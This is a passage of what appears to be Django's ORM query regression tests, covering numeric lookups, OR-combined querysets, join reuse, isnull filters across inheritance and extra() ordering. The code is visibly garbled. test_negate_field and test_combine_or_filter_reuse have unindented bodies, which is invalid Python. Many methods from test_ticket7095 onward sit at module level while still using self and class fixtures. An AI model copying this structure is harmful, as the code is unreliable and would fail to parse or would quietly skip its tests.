            Note.objects.filter(tag__annotation__name='a1').filter(~Q(tag__annotation__name=F('note'))),
            [],
        )
    def test_field_with_filterable(self):
        """Filtering on a FK whose target model defines a field named
        'filterable' works."""
        self.assertSequenceEqual(
            Author.objects.filter(extra=self.e2),
            [self.a3, self.a4],
        )
def test_negate_field(self):
self.assertSequenceEqual(
Note.objects.filter(negate=True),
[self.n1, self.n2],
)
self.assertSequenceEqual(Note.objects.exclude(negate=True), [self.n3])
class Queries2Tests(TestCase):
    """Numeric lookup tests: impossible-range detection and float-boundary
    rounding on integer comparisons."""
    @classmethod
    def setUpTestData(cls):
        cls.num4 = Number.objects.create(num=4)
        cls.num8 = Number.objects.create(num=8)
        cls.num12 = Number.objects.create(num=12)
    def test_ticket4289(self):
        """Combinations of gt/lt constraints, including Q objects, return
        the correct (possibly empty) result sets."""
        # A slight variation on the restricting the filtering choices by the
        # lookup constraints.
        self.assertSequenceEqual(Number.objects.filter(num__lt=4), [])
        self.assertSequenceEqual(Number.objects.filter(num__gt=8, num__lt=12), [])
        self.assertSequenceEqual(
            Number.objects.filter(num__gt=8, num__lt=13),
            [self.num12],
        )
        self.assertSequenceEqual(
            Number.objects.filter(Q(num__lt=4) | Q(num__gt=8, num__lt=12)),
            []
        )
        self.assertSequenceEqual(
            Number.objects.filter(Q(num__gt=8, num__lt=12) | Q(num__lt=4)),
            []
        )
        self.assertSequenceEqual(
            Number.objects.filter(Q(num__gt=8) & Q(num__lt=12) | Q(num__lt=4)),
            []
        )
        self.assertSequenceEqual(
            Number.objects.filter(Q(num__gt=7) & Q(num__lt=12) | Q(num__lt=4)),
            [self.num8],
        )
    def test_ticket12239(self):
        """Float comparison values against an IntegerField are rounded in
        the direction that preserves the lookup's semantics."""
        # Custom lookups are registered to round float values correctly on gte
        # and lt IntegerField queries.
        self.assertSequenceEqual(
            Number.objects.filter(num__gt=11.9),
            [self.num12],
        )
        self.assertSequenceEqual(Number.objects.filter(num__gt=12), [])
        self.assertSequenceEqual(Number.objects.filter(num__gt=12.0), [])
        self.assertSequenceEqual(Number.objects.filter(num__gt=12.1), [])
        self.assertCountEqual(
            Number.objects.filter(num__lt=12),
            [self.num4, self.num8],
        )
        self.assertCountEqual(
            Number.objects.filter(num__lt=12.0),
            [self.num4, self.num8],
        )
        self.assertCountEqual(
            Number.objects.filter(num__lt=12.1),
            [self.num4, self.num8, self.num12],
        )
        self.assertCountEqual(
            Number.objects.filter(num__gte=11.9),
            [self.num12],
        )
        self.assertCountEqual(
            Number.objects.filter(num__gte=12),
            [self.num12],
        )
        self.assertCountEqual(
            Number.objects.filter(num__gte=12.0),
            [self.num12],
        )
        self.assertSequenceEqual(Number.objects.filter(num__gte=12.1), [])
        self.assertSequenceEqual(Number.objects.filter(num__gte=12.9), [])
        self.assertCountEqual(
            Number.objects.filter(num__lte=11.9),
            [self.num4, self.num8],
        )
        self.assertCountEqual(
            Number.objects.filter(num__lte=12),
            [self.num4, self.num8, self.num12],
        )
        self.assertCountEqual(
            Number.objects.filter(num__lte=12.0),
            [self.num4, self.num8, self.num12],
        )
        self.assertCountEqual(
            Number.objects.filter(num__lte=12.1),
            [self.num4, self.num8, self.num12],
        )
        self.assertCountEqual(
            Number.objects.filter(num__lte=12.9),
            [self.num4, self.num8, self.num12],
        )
    def test_ticket7759(self):
        """count() works on a queryset whose result set is only partially
        iterated."""
        # Count should work with a partially read result set.
        count = Number.objects.count()
        qs = Number.objects.all()
        def run():
            # Return from inside the loop so qs is only partially consumed.
            for obj in qs:
                return qs.count() == count
        self.assertTrue(run())
class Queries3Tests(TestCase):
    """Error-handling tests for datetimes() and values()/defer() chains."""
    def test_ticket7107(self):
        """Evaluating a queryset on a self-referential model terminates."""
        # This shouldn't create an infinite loop.
        self.assertQuerysetEqual(Valid.objects.all(), [])
    def test_datetimes_invalid_field(self):
        """datetimes() on a non-date field raises TypeError."""
        # An error should be raised when QuerySet.datetimes() is passed the
        # wrong type of field.
        msg = "'name' isn't a DateField, TimeField, or DateTimeField."
        with self.assertRaisesMessage(TypeError, msg):
            Item.objects.datetimes('name', 'month')
    def test_ticket22023(self):
        """only()/defer() after values() raise TypeError."""
        with self.assertRaisesMessage(TypeError, "Cannot call only() after .values() or .values_list()"):
            Valid.objects.values().only()
        with self.assertRaisesMessage(TypeError, "Cannot call defer() after .values() or .values_list()"):
            Valid.objects.values().defer()
class Queries4Tests(TestCase):
    @classmethod
    def setUpTestData(cls):
        """Create the shared fixtures: authors a1/a3 with extras, reports
        r1-r3 (r3 creator-less), and items i1/i2."""
        generic = NamedCategory.objects.create(name="Generic")
        cls.t1 = Tag.objects.create(name='t1', category=generic)
        n1 = Note.objects.create(note='n1', misc='foo')
        n2 = Note.objects.create(note='n2', misc='bar')
        e1 = ExtraInfo.objects.create(info='e1', note=n1)
        e2 = ExtraInfo.objects.create(info='e2', note=n2)
        cls.a1 = Author.objects.create(name='a1', num=1001, extra=e1)
        cls.a3 = Author.objects.create(name='a3', num=3003, extra=e2)
        cls.r1 = Report.objects.create(name='r1', creator=cls.a1)
        cls.r2 = Report.objects.create(name='r2', creator=cls.a3)
        cls.r3 = Report.objects.create(name='r3')
        cls.i1 = Item.objects.create(name='i1', created=datetime.datetime.now(), note=n1, creator=cls.a1)
        cls.i2 = Item.objects.create(name='i2', created=datetime.datetime.now(), note=n1, creator=cls.a3)
    def test_ticket24525(self):
        """ANDing a related-manager queryset with an exclude(__in=...)
        queryset returns the correct intersection."""
        tag = Tag.objects.create()
        anth100 = tag.note_set.create(note='ANTH', misc='100')
        math101 = tag.note_set.create(note='MATH', misc='101')
        s1 = tag.annotation_set.create(name='1')
        s2 = tag.annotation_set.create(name='2')
        s1.notes.set([math101, anth100])
        s2.notes.set([math101])
        result = math101.annotation_set.all() & tag.annotation_set.exclude(notes__in=[anth100])
        self.assertEqual(list(result), [s2])
    def test_ticket11811(self):
        """Passing an unsaved model instance to update() raises ValueError."""
        unsaved_category = NamedCategory(name="Other")
        msg = 'Unsaved model instance <NamedCategory: Other> cannot be used in an ORM query.'
        with self.assertRaisesMessage(ValueError, msg):
            Tag.objects.filter(pk=self.t1.pk).update(category=unsaved_category)
    def test_ticket14876(self):
        """A single filter with ORed Qs produces the same SQL and results
        as ORing two separately-filtered querysets."""
        # Note: when combining the query we need to have information available
        # about the join type of the trimmed "creator__isnull" join. If we
        # don't have that information, then the join is created as INNER JOIN
        # and results will be incorrect.
        q1 = Report.objects.filter(Q(creator__isnull=True) | Q(creator__extra__info='e1'))
        q2 = Report.objects.filter(Q(creator__isnull=True)) | Report.objects.filter(Q(creator__extra__info='e1'))
        self.assertCountEqual(q1, [self.r1, self.r3])
        self.assertEqual(str(q1.query), str(q2.query))
        q1 = Report.objects.filter(Q(creator__extra__info='e1') | Q(creator__isnull=True))
        q2 = Report.objects.filter(Q(creator__extra__info='e1')) | Report.objects.filter(Q(creator__isnull=True))
        self.assertCountEqual(q1, [self.r1, self.r3])
        self.assertEqual(str(q1.query), str(q2.query))
        q1 = Item.objects.filter(Q(creator=self.a1) | Q(creator__report__name='r1')).order_by()
        q2 = (
            Item.objects
            .filter(Q(creator=self.a1)).order_by() | Item.objects.filter(Q(creator__report__name='r1'))
            .order_by()
        )
        self.assertCountEqual(q1, [self.i1])
        self.assertEqual(str(q1.query), str(q2.query))
        q1 = Item.objects.filter(Q(creator__report__name='e1') | Q(creator=self.a1)).order_by()
        q2 = (
            Item.objects.filter(Q(creator__report__name='e1')).order_by() |
            Item.objects.filter(Q(creator=self.a1)).order_by()
        )
        self.assertCountEqual(q1, [self.i1])
        self.assertEqual(str(q1.query), str(q2.query))
    def test_combine_join_reuse(self):
        """ORing querysets recreates identical joins in the right-hand
        query instead of incorrectly sharing aliases (#18748)."""
        # Joins having identical connections are correctly recreated in the
        # rhs query, in case the query is ORed together (#18748).
        Report.objects.create(name='r4', creator=self.a1)
        q1 = Author.objects.filter(report__name='r5')
        q2 = Author.objects.filter(report__name='r4').filter(report__name='r1')
        combined = q1 | q2
        self.assertEqual(str(combined.query).count('JOIN'), 2)
        self.assertEqual(len(combined), 1)
        self.assertEqual(combined[0].name, 'a1')
def test_combine_or_filter_reuse(self):
combined = Author.objects.filter(name='a1') | Author.objects.filter(name='a3')
self.assertEqual(combined.get(name='a1'), self.a1)
    def test_join_reuse_order(self):
        """ORing querysets with stacked m2m filters reuses join aliases in
        order without tripping over circular alias change maps (#26522)."""
        # Join aliases are reused in order. This shouldn't raise AssertionError
        # because change_map contains a circular reference (#26522).
        s1 = School.objects.create()
        s2 = School.objects.create()
        s3 = School.objects.create()
        t1 = Teacher.objects.create()
        otherteachers = Teacher.objects.exclude(pk=t1.pk).exclude(friends=t1)
        qs1 = otherteachers.filter(schools=s1).filter(schools=s2)
        qs2 = otherteachers.filter(schools=s1).filter(schools=s3)
        self.assertQuerysetEqual(qs1 | qs2, [])
def test_ticket7095(self):
    """Self-filtered updates, outer joins for values()/select_related() (#7095)."""
    # Updates that are filtered on the model being updated are somewhat
    # tricky in MySQL.
    ManagedModel.objects.create(data='mm1', tag=self.t1, public=True)
    self.assertEqual(ManagedModel.objects.update(data='mm'), 1)
    # A values() or values_list() query across joined models must use outer
    # joins appropriately.
    # Note: In Oracle, we expect a null CharField to return '' instead of
    # None.
    if connection.features.interprets_empty_strings_as_nulls:
        expected_null_charfield_repr = ''
    else:
        expected_null_charfield_repr = None
    self.assertSequenceEqual(
        Report.objects.values_list("creator__extra__info", flat=True).order_by("name"),
        ['e1', 'e2', expected_null_charfield_repr],
    )
    # Similarly for select_related(), joins beyond an initial nullable join
    # must use outer joins so that all results are included.
    self.assertSequenceEqual(
        Report.objects.select_related("creator", "creator__extra").order_by("name"),
        [self.r1, self.r2, self.r3]
    )
    # When there are multiple paths to a table from another table, we have
    # to be careful not to accidentally reuse an inappropriate join when
    # using select_related(). We used to return the parent's Detail record
    # here by mistake.
    d1 = Detail.objects.create(data="d1")
    d2 = Detail.objects.create(data="d2")
    m1 = Member.objects.create(name="m1", details=d1)
    m2 = Member.objects.create(name="m2", details=d2)
    Child.objects.create(person=m2, parent=m1)
    obj = m1.children.select_related("person__details")[0]
    # The child's person is m2, so its details must be d2 (not parent's d1).
    self.assertEqual(obj.person.details.data, 'd2')
def test_order_by_resetting(self):
    """order_by() with no args clears ordering; a later order_by() re-adds it."""
    queryset = Author.objects.order_by()
    queryset = queryset.order_by('name')
    compiled_sql = queryset.query.get_compiler(queryset.db).as_sql()[0]
    self.assertIn('ORDER BY', compiled_sql)
def test_order_by_reverse_fk(self):
    """Ordering by a reverse foreign key is allowed but may duplicate rows."""
    cat_a = SimpleCategory.objects.create(name="category1")
    cat_b = SimpleCategory.objects.create(name="category2")
    # Two items for cat_a, one for cat_b -> cat_a appears twice in results.
    for category in (cat_a, cat_b, cat_a):
        CategoryItem.objects.create(category=category)
    self.assertSequenceEqual(
        SimpleCategory.objects.order_by('categoryitem', 'pk'),
        [cat_a, cat_b, cat_a],
    )
def test_filter_reverse_non_integer_pk(self):
    """Filtering across a reverse relation works when the pk is non-integer."""
    pk_holder = DateTimePK.objects.create()
    info = ExtraInfo.objects.create(info='extra', date=pk_holder)
    fetched = DateTimePK.objects.filter(extrainfo=info).get()
    self.assertEqual(fetched, pk_holder)
def test_ticket10181(self):
    """A provably-empty inner query must not raise EmptyResultSet (#10181)."""
    # Avoid raising an EmptyResultSet if an inner query is probably
    # empty (and hence, not executed).
    self.assertQuerysetEqual(
        Tag.objects.filter(id__in=Tag.objects.filter(id__in=[])),
        []
    )
def test_ticket15316_filter_false(self):
    """filter(isnull=False) across multi-table inheritance (#15316)."""
    c1 = SimpleCategory.objects.create(name="category1")
    c2 = SpecialCategory.objects.create(name="named category1", special_name="special1")
    c3 = SpecialCategory.objects.create(name="named category2", special_name="special2")
    CategoryItem.objects.create(category=c1)
    ci2 = CategoryItem.objects.create(category=c2)
    ci3 = CategoryItem.objects.create(category=c3)
    # Only items whose category IS a SpecialCategory should match.
    qs = CategoryItem.objects.filter(category__specialcategory__isnull=False)
    self.assertEqual(qs.count(), 2)
    self.assertSequenceEqual(qs, [ci2, ci3])
def test_ticket15316_exclude_false(self):
    """exclude(isnull=False) across multi-table inheritance (#15316)."""
    c1 = SimpleCategory.objects.create(name="category1")
    c2 = SpecialCategory.objects.create(name="named category1", special_name="special1")
    c3 = SpecialCategory.objects.create(name="named category2", special_name="special2")
    ci1 = CategoryItem.objects.create(category=c1)
    CategoryItem.objects.create(category=c2)
    CategoryItem.objects.create(category=c3)
    # Only the item with a plain SimpleCategory should remain.
    qs = CategoryItem.objects.exclude(category__specialcategory__isnull=False)
    self.assertEqual(qs.count(), 1)
    self.assertSequenceEqual(qs, [ci1])
def test_ticket15316_filter_true(self):
    """filter(isnull=True) across multi-table inheritance (#15316)."""
    c1 = SimpleCategory.objects.create(name="category1")
    c2 = SpecialCategory.objects.create(name="named category1", special_name="special1")
    c3 = SpecialCategory.objects.create(name="named category2", special_name="special2")
    ci1 = CategoryItem.objects.create(category=c1)
    CategoryItem.objects.create(category=c2)
    CategoryItem.objects.create(category=c3)
    # Only the item whose category has no SpecialCategory child row matches.
    qs = CategoryItem.objects.filter(category__specialcategory__isnull=True)
    self.assertEqual(qs.count(), 1)
    self.assertSequenceEqual(qs, [ci1])
def test_ticket15316_exclude_true(self):
    """exclude(isnull=True) across multi-table inheritance (#15316)."""
    c1 = SimpleCategory.objects.create(name="category1")
    c2 = SpecialCategory.objects.create(name="named category1", special_name="special1")
    c3 = SpecialCategory.objects.create(name="named category2", special_name="special2")
    CategoryItem.objects.create(category=c1)
    ci2 = CategoryItem.objects.create(category=c2)
    ci3 = CategoryItem.objects.create(category=c3)
    # Excluding "no special child" leaves only the SpecialCategory items.
    qs = CategoryItem.objects.exclude(category__specialcategory__isnull=True)
    self.assertEqual(qs.count(), 2)
    self.assertSequenceEqual(qs, [ci2, ci3])
def test_ticket15316_one2one_filter_false(self):
    """filter(isnull=False) through a reverse one-to-one relation (#15316)."""
    c = SimpleCategory.objects.create(name="cat")
    c0 = SimpleCategory.objects.create(name="cat0")
    c1 = SimpleCategory.objects.create(name="category1")
    OneToOneCategory.objects.create(category=c1, new_name="new1")
    OneToOneCategory.objects.create(category=c0, new_name="new2")
    CategoryItem.objects.create(category=c)
    ci2 = CategoryItem.objects.create(category=c0)
    ci3 = CategoryItem.objects.create(category=c1)
    # Only items whose category has a OneToOneCategory should match.
    qs = CategoryItem.objects.filter(category__onetoonecategory__isnull=False).order_by('pk')
    self.assertEqual(qs.count(), 2)
    self.assertSequenceEqual(qs, [ci2, ci3])
def test_ticket15316_one2one_exclude_false(self):
    """exclude(isnull=False) through a reverse one-to-one relation (#15316)."""
    c = SimpleCategory.objects.create(name="cat")
    c0 = SimpleCategory.objects.create(name="cat0")
    c1 = SimpleCategory.objects.create(name="category1")
    OneToOneCategory.objects.create(category=c1, new_name="new1")
    OneToOneCategory.objects.create(category=c0, new_name="new2")
    ci1 = CategoryItem.objects.create(category=c)
    CategoryItem.objects.create(category=c0)
    CategoryItem.objects.create(category=c1)
    # Only the item whose category has no OneToOneCategory should remain.
    qs = CategoryItem.objects.exclude(category__onetoonecategory__isnull=False)
    self.assertEqual(qs.count(), 1)
    self.assertSequenceEqual(qs, [ci1])
def test_ticket15316_one2one_filter_true(self):
    """filter(isnull=True) through a reverse one-to-one relation (#15316)."""
    c = SimpleCategory.objects.create(name="cat")
    c0 = SimpleCategory.objects.create(name="cat0")
    c1 = SimpleCategory.objects.create(name="category1")
    OneToOneCategory.objects.create(category=c1, new_name="new1")
    OneToOneCategory.objects.create(category=c0, new_name="new2")
    ci1 = CategoryItem.objects.create(category=c)
    CategoryItem.objects.create(category=c0)
    CategoryItem.objects.create(category=c1)
    # Only the item whose category has no OneToOneCategory matches.
    qs = CategoryItem.objects.filter(category__onetoonecategory__isnull=True)
    self.assertEqual(qs.count(), 1)
    self.assertSequenceEqual(qs, [ci1])
def test_ticket15316_one2one_exclude_true(self):
    """exclude(isnull=True) through a reverse one-to-one relation (#15316)."""
    c = SimpleCategory.objects.create(name="cat")
    c0 = SimpleCategory.objects.create(name="cat0")
    c1 = SimpleCategory.objects.create(name="category1")
    OneToOneCategory.objects.create(category=c1, new_name="new1")
    OneToOneCategory.objects.create(category=c0, new_name="new2")
    CategoryItem.objects.create(category=c)
    ci2 = CategoryItem.objects.create(category=c0)
    ci3 = CategoryItem.objects.create(category=c1)
    # Excluding "no one-to-one child" leaves the two items with one.
    qs = CategoryItem.objects.exclude(category__onetoonecategory__isnull=True).order_by('pk')
    self.assertEqual(qs.count(), 2)
    self.assertSequenceEqual(qs, [ci2, ci3])
class Queries5Tests(TestCase):
    """Cross-model Meta ordering, extra() select/order_by, and related regressions."""
    @classmethod
    def setUpTestData(cls):
        # Ordering by 'rank' gives us rank2, rank1, rank3. Ordering by the
        # Meta.ordering will be rank3, rank2, rank1.
        cls.n1 = Note.objects.create(note='n1', misc='foo', id=1)
        cls.n2 = Note.objects.create(note='n2', misc='bar', id=2)
        e1 = ExtraInfo.objects.create(info='e1', note=cls.n1)
        e2 = ExtraInfo.objects.create(info='e2', note=cls.n2)
        a1 = Author.objects.create(name='a1', num=1001, extra=e1)
        a2 = Author.objects.create(name='a2', num=2002, extra=e1)
        a3 = Author.objects.create(name='a3', num=3003, extra=e2)
        cls.rank2 = Ranking.objects.create(rank=2, author=a2)
        cls.rank1 = Ranking.objects.create(rank=1, author=a3)
        cls.rank3 = Ranking.objects.create(rank=3, author=a1)
    def test_ordering(self):
        """Meta ordering may cross models; extra() columns may order too."""
        # Cross model ordering is possible in Meta, too.
        self.assertSequenceEqual(
            Ranking.objects.all(),
            [self.rank3, self.rank2, self.rank1],
        )
        self.assertSequenceEqual(
            Ranking.objects.all().order_by('rank'),
            [self.rank1, self.rank2, self.rank3],
        )
        # Ordering of extra() pieces is possible, too and you can mix extra
        # fields and model fields in the ordering.
        self.assertSequenceEqual(
            Ranking.objects.extra(tables=['django_site'], order_by=['-django_site.id', 'rank']),
            [self.rank1, self.rank2, self.rank3],
        )
        sql = 'case when %s > 2 then 1 else 0 end' % connection.ops.quote_name('rank')
        qs = Ranking.objects.extra(select={'good': sql})
        self.assertEqual(
            [o.good for o in qs.extra(order_by=('-good',))],
            [True, False, False]
        )
        self.assertSequenceEqual(
            qs.extra(order_by=('-good', 'id')),
            [self.rank3, self.rank2, self.rank1],
        )
        # Despite having some extra aliases in the query, we can still omit
        # them in a values() query.
        dicts = qs.values('id', 'rank').order_by('id')
        self.assertEqual(
            [d['rank'] for d in dicts],
            [2, 1, 3]
        )
    def test_ticket7256(self):
        """An empty values() call includes extra() aliases (#7256)."""
        # An empty values() call includes all aliases, including those from an
        # extra()
        sql = 'case when %s > 2 then 1 else 0 end' % connection.ops.quote_name('rank')
        qs = Ranking.objects.extra(select={'good': sql})
        dicts = qs.values().order_by('id')
        for d in dicts:
            del d['id']
            del d['author_id']
        self.assertEqual(
            [sorted(d.items()) for d in dicts],
            [[('good', 0), ('rank', 2)], [('good', 0), ('rank', 1)], [('good', 1), ('rank', 3)]]
        )
    def test_ticket7045(self):
        """extra(tables=...) must survive repeated SQL compilation (#7045)."""
        # Extra tables used to crash SQL construction on the second use.
        qs = Ranking.objects.extra(tables=['django_site'])
        qs.query.get_compiler(qs.db).as_sql()
        # test passes if this doesn't raise an exception.
        qs.query.get_compiler(qs.db).as_sql()
    def test_ticket9848(self):
        """Updates filtered on related tables touch only the right rows (#9848)."""
        # Make sure that updates which only filter on sub-tables don't
        # inadvertently update the wrong records (bug #9848).
        author_start = Author.objects.get(name='a1')
        ranking_start = Ranking.objects.get(author__name='a1')
        # Make sure that the IDs from different tables don't happen to match.
        self.assertSequenceEqual(
            Ranking.objects.filter(author__name='a1'),
            [self.rank3],
        )
        self.assertEqual(
            Ranking.objects.filter(author__name='a1').update(rank=4636),
            1
        )
        r = Ranking.objects.get(author__name='a1')
        self.assertEqual(r.id, ranking_start.id)
        self.assertEqual(r.author.id, author_start.id)
        self.assertEqual(r.rank, 4636)
        # Restore the original rank so the final ordering check holds.
        r.rank = 3
        r.save()
        self.assertSequenceEqual(
            Ranking.objects.all(),
            [self.rank3, self.rank2, self.rank1],
        )
    def test_ticket5261(self):
        """Empty Q() objects in filter/exclude are no-ops (#5261)."""
        # Test different empty excludes.
        self.assertSequenceEqual(
            Note.objects.exclude(Q()),
            [self.n1, self.n2],
        )
        self.assertSequenceEqual(
            Note.objects.filter(~Q()),
            [self.n1, self.n2],
        )
        self.assertSequenceEqual(
            Note.objects.filter(~Q() | ~Q()),
            [self.n1, self.n2],
        )
        self.assertSequenceEqual(
            Note.objects.exclude(~Q() & ~Q()),
            [self.n1, self.n2],
        )
    def test_extra_select_literal_percent_s(self):
        """%%s in an extra() select escapes to a literal %s."""
        # Allow %%s to escape select clauses
        self.assertEqual(
            Note.objects.extra(select={'foo': "'%%s'"})[0].foo,
            '%s'
        )
        self.assertEqual(
            Note.objects.extra(select={'foo': "'%%s bar %%s'"})[0].foo,
            '%s bar %s'
        )
        self.assertEqual(
            Note.objects.extra(select={'foo': "'bar %%s'"})[0].foo,
            'bar %s'
        )
    def test_queryset_reuse(self):
        """Using a queryset as a subquery must not mutate its aliases."""
        # Using querysets doesn't mutate aliases.
        authors = Author.objects.filter(Q(name='a1') | Q(name='nonexistent'))
        self.assertEqual(Ranking.objects.filter(author__in=authors).get(), self.rank3)
        self.assertEqual(authors.count(), 1)
class SelectRelatedTests(TestCase):
    """select_related() with circular relations (#3045, #3288)."""
    def test_tickets_3045_3288(self):
        """select_related() on circular relations must terminate."""
        # Once upon a time, select_related() with circular relations would loop
        # infinitely if you forgot to specify "depth". Now we set an arbitrary
        # default upper bound.
        self.assertQuerysetEqual(X.objects.all(), [])
        self.assertQuerysetEqual(X.objects.select_related(), [])
class SubclassFKTests(TestCase):
    """Deleting model subclasses with nullable back-references (#7778)."""
    def test_ticket7778(self):
        """Deleting a subclass cascades to its parent row."""
        # Model subclasses could not be deleted if a nullable foreign key
        # relates to a model that relates back.
        num_celebs = Celebrity.objects.count()
        tvc = TvChef.objects.create(name="Huey")
        self.assertEqual(Celebrity.objects.count(), num_celebs + 1)
        Fan.objects.create(fan_of=tvc)
        Fan.objects.create(fan_of=tvc)
        tvc.delete()
        # The parent object should have been deleted as well.
        self.assertEqual(Celebrity.objects.count(), num_celebs)
class CustomPkTests(TestCase):
    """Ordering by a related model with a custom primary key (#7371)."""
    def test_ticket7371(self):
        # Ordering across the custom-pk relation should not raise.
        self.assertQuerysetEqual(Related.objects.order_by('custom'), [])
class NullableRelOrderingTests(TestCase):
    """Ordering across nullable relations must use LEFT joins (#10028)."""
    def test_ticket10028(self):
        """Rows without the nullable relation are still included."""
        # Ordering by model related to nullable relations(!) should use outer
        # joins, so that all results are included.
        p1 = Plaything.objects.create(name="p1")
        self.assertSequenceEqual(Plaything.objects.all(), [p1])
    def test_join_already_in_query(self):
        """Ordering must not flip the type of joins already in the query."""
        # Ordering by model related to nullable relations should not change
        # the join type of already existing joins.
        Plaything.objects.create(name="p1")
        s = SingleObject.objects.create(name='s')
        r = RelatedObject.objects.create(single=s, f=1)
        p2 = Plaything.objects.create(name="p2", others=r)
        qs = Plaything.objects.all().filter(others__isnull=False).order_by('pk')
        self.assertNotIn('JOIN', str(qs.query))
        qs = Plaything.objects.all().filter(others__f__isnull=False).order_by('pk')
        self.assertIn('INNER', str(qs.query))
        qs = qs.order_by('others__single__name')
        # The ordering by others__single__pk will add one new join (to single)
        # and that join must be LEFT join. The already existing join to related
        # objects must be kept INNER. So, we have both an INNER and a LEFT join
        # in the query.
        self.assertEqual(str(qs.query).count('LEFT'), 1)
        self.assertEqual(str(qs.query).count('INNER'), 1)
        self.assertSequenceEqual(qs, [p2])
class DisjunctiveFilterTests(TestCase):
    """Filtering after/within disjunctions (#7872, #8283)."""
    @classmethod
    def setUpTestData(cls):
        cls.n1 = Note.objects.create(note='n1', misc='foo', id=1)
        cls.e1 = ExtraInfo.objects.create(info='e1', note=cls.n1)
    def test_ticket7872(self):
        """Disjunction across a missing related row keeps the base match."""
        # Another variation on the disjunctive filtering theme.
        # For the purposes of this regression test, it's important that there is no
        # Join object related to the LeafA we create.
        l1 = LeafA.objects.create(data='first')
        self.assertSequenceEqual(LeafA.objects.all(), [l1])
        self.assertSequenceEqual(
            LeafA.objects.filter(Q(data='first') | Q(join__b__data='second')),
            [l1],
        )
    def test_ticket8283(self):
        """Filters applied after an OR combine correctly in either order."""
        # Checking that applying filters after a disjunction works correctly.
        self.assertSequenceEqual(
            (ExtraInfo.objects.filter(note=self.n1) | ExtraInfo.objects.filter(info='e2')).filter(note=self.n1),
            [self.e1],
        )
        self.assertSequenceEqual(
            (ExtraInfo.objects.filter(info='e2') | ExtraInfo.objects.filter(note=self.n1)).filter(note=self.n1),
            [self.e1],
        )
class Queries6Tests(TestCase):
    """Parallel iteration, nested subqueries, and multi-valued exclude() regressions."""
    @classmethod
    def setUpTestData(cls):
        generic = NamedCategory.objects.create(name="Generic")
        cls.t1 = Tag.objects.create(name='t1', category=generic)
        cls.t2 = Tag.objects.create(name='t2', parent=cls.t1, category=generic)
        cls.t3 = Tag.objects.create(name='t3', parent=cls.t1)
        cls.t4 = Tag.objects.create(name='t4', parent=cls.t3)
        cls.t5 = Tag.objects.create(name='t5', parent=cls.t3)
        n1 = Note.objects.create(note='n1', misc='foo', id=1)
        cls.ann1 = Annotation.objects.create(name='a1', tag=cls.t1)
        cls.ann1.notes.add(n1)
        cls.ann2 = Annotation.objects.create(name='a2', tag=cls.t4)
    def test_parallel_iterators(self):
        """Two iterators over one queryset advance independently."""
        # Parallel iterators work.
        qs = Tag.objects.all()
        i1, i2 = iter(qs), iter(qs)
        self.assertEqual(repr(next(i1)), '<Tag: t1>')
        self.assertEqual(repr(next(i1)), '<Tag: t2>')
        self.assertEqual(repr(next(i2)), '<Tag: t1>')
        self.assertEqual(repr(next(i2)), '<Tag: t2>')
        self.assertEqual(repr(next(i2)), '<Tag: t3>')
        self.assertEqual(repr(next(i1)), '<Tag: t3>')
        qs = X.objects.all()
        # An empty queryset is falsy, and stays falsy on re-evaluation.
        self.assertFalse(qs)
        self.assertFalse(qs)
    def test_nested_queries_sql(self):
        """A nested queryset compiles to a nested SELECT, not an evaluation."""
        # Nested queries should not evaluate the inner query as part of constructing the
        # SQL (so we should see a nested query here, indicated by two "SELECT" calls).
        qs = Annotation.objects.filter(notes__in=Note.objects.filter(note="xyzzy"))
        self.assertEqual(
            qs.query.get_compiler(qs.db).as_sql()[0].count('SELECT'),
            2
        )
    def test_tickets_8921_9188(self):
        """exclude() across multi-valued relations generates correct SQL."""
        # Incorrect SQL was being generated for certain types of exclude()
        # queries that crossed multi-valued relations (#8921, #9188 and some
        # preemptively discovered cases).
        self.assertSequenceEqual(
            PointerA.objects.filter(connection__pointerb__id=1),
            []
        )
        self.assertSequenceEqual(
            PointerA.objects.exclude(connection__pointerb__id=1),
            []
        )
        self.assertSequenceEqual(
            Tag.objects.exclude(children=None),
            [self.t1, self.t3],
        )
        # This example is tricky because the parent could be NULL, so only checking
        # parents with annotations omits some results (tag t1, in this case).
        self.assertSequenceEqual(
            Tag.objects.exclude(parent__annotation__name="a1"),
            [self.t1, self.t4, self.t5],
        )
        # The annotation->tag link is single values and tag->children links is
        # multi-valued. So we have to split the exclude filter in the middle
        # and then optimize the inner query without losing results.
        self.assertSequenceEqual(
            Annotation.objects.exclude(tag__children__name="t2"),
            [self.ann2],
        )
        # Nested queries are possible (although should be used with care, since
        # they have performance problems on backends like MySQL.
        self.assertSequenceEqual(
            Annotation.objects.filter(notes__in=Note.objects.filter(note="n1")),
            [self.ann1],
        )
    def test_ticket3739(self):
        """all() returns a copy, not the same queryset object (#3739)."""
        # The all() method on querysets returns a copy of the queryset.
        q1 = Tag.objects.order_by('name')
        self.assertIsNot(q1, q1.all())
    def test_ticket_11320(self):
        """Chained excludes over the same relation reuse a single join (#11320)."""
        qs = Tag.objects.exclude(category=None).exclude(category__name='foo')
        self.assertEqual(str(qs.query).count(' INNER JOIN '), 1)
    def test_distinct_ordered_sliced_subquery_aggregation(self):
        """count() works on a distinct, ordered, sliced queryset."""
        self.assertEqual(Tag.objects.distinct().order_by('category__name')[:3].count(), 3)
    def test_multiple_columns_with_the_same_name_slice(self):
        """Slicing with duplicate column names across joins keeps columns straight."""
        self.assertEqual(
            list(Tag.objects.order_by('name').values_list('name', 'category__name')[:2]),
            [('t1', 'Generic'), ('t2', 'Generic')],
        )
        self.assertSequenceEqual(
            Tag.objects.order_by('name').select_related('category')[:2],
            [self.t1, self.t2],
        )
        self.assertEqual(
            list(Tag.objects.order_by('-name').values_list('name', 'parent__name')[:2]),
            [('t5', 't3'), ('t4', 't3')],
        )
        self.assertSequenceEqual(
            Tag.objects.order_by('-name').select_related('parent')[:2],
            [self.t5, self.t4],
        )
    def test_col_alias_quoted(self):
        """Generated column aliases are quoted in the emitted SQL."""
        with CaptureQueriesContext(connection) as captured_queries:
            self.assertEqual(
                Tag.objects.values('parent').annotate(
                    tag_per_parent=Count('pk'),
                ).aggregate(Max('tag_per_parent')),
                {'tag_per_parent__max': 2},
            )
        sql = captured_queries[0]['sql']
        self.assertIn('AS %s' % connection.ops.quote_name('col1'), sql)
class RawQueriesTests(TestCase):
    """repr() of RawQuerySet with interpolated parameters (#14729)."""
    @classmethod
    def setUpTestData(cls):
        Note.objects.create(note='n1', misc='foo', id=1)
    def test_ticket14729(self):
        """repr() of a raw query shows params substituted into the SQL."""
        # Test representation of raw query with one or few parameters passed as list
        query = "SELECT * FROM queries_note WHERE note = %s"
        params = ['n1']
        qs = Note.objects.raw(query, params=params)
